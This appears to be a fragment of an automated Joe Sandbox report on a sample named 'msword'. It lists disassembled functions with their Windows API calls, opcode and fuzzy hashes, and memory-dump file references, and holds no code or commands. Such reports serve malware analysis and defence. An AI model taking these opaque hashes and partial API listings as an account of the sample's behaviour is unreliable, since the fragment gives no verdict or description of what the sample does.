                                                                            • API String ID:
                                                                            • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                            • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                                                            • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                            • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                                                            Function 00407752 Relevance: 5.2, APIs: 4, Instructions: 179COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                            • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                                                            • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                            • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                                                            Function 00407854 Relevance: 5.2, APIs: 4, Instructions: 169COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                            • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                                                                            • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                            • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                                                                            Function 004077B2 Relevance: 5.2, APIs: 4, Instructions: 166COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                            • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                                                                            • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                            • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                                                                            Function 00407C5F Relevance: 5.2, APIs: 4, Instructions: 156memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GlobalFree.KERNELBASE(?), ref: 004073C5
                                                                            • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                                                            • GlobalFree.KERNELBASE(?), ref: 0040743D
                                                                            • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: Global$AllocFree
                                                                            • String ID:
                                                                            • API String ID: 3394109436-0
                                                                            • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                            • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                                                            • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                            • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                                                            Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                            • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                            • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                                                            • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                            • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                                                            Function 00405E50 Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: File$AttributesCreate
                                                                            • String ID:
                                                                            • API String ID: 415043291-0
                                                                            • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                            • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                                                            • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                            • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                                                            Function 00405E30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                            • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                                                            • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                            • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                                                            Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID:
                                                                            • API String ID: 2738559852-0
                                                                            • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                            • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                                                            • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                            • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                                                            Function 004037CC Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                              • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                              • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                              • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                            • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: Char$Next$CreateDirectoryPrev
                                                                            • String ID:
                                                                            • API String ID: 4115351271-0
                                                                            • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                            • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                                                            • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                            • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                                                            Function 00403DAF Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                                            • Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
                                                                            • Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                                            • Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E
                                                                            Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: FilePointer
                                                                            • String ID:
                                                                            • API String ID: 973152223-0
                                                                            • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                            • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                                                            • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                            • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
                                                                            Function 00403D98 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                                            • Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
                                                                            • Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                                            • Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08
                                                                            Function 00403D85 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: CallbackDispatcherUser
                                                                            • String ID:
                                                                            • API String ID: 2492992576-0
                                                                            • Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                            • Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
                                                                            • Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                            • Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08

                                                                            Non-executed Functions

                                                                            Function 0040497C Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                                                            • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                                                            • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                                                            • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                                                            • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                                                            • DeleteObject.GDI32(?), ref: 00404A79
                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                                                            • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                                                            • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                                                            • GlobalFree.KERNEL32(?), ref: 00404DAC
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                                                            • ShowWindow.USER32(?,00000000), ref: 00404F49
                                                                            • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                                                            • ShowWindow.USER32(00000000), ref: 00404F5B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                            • String ID: $ @$M$N
                                                                            • API String ID: 1638840714-3479655940
                                                                            • Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                                            • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                                                            • Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                                            • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                                                            Function 004044A5 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 300stringkeyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                                                            • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                                                            • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                                                            • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                                                            • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                                                            • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                                                            • SetWindowTextW.USER32(?,?), ref: 00404583
                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                                                            • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
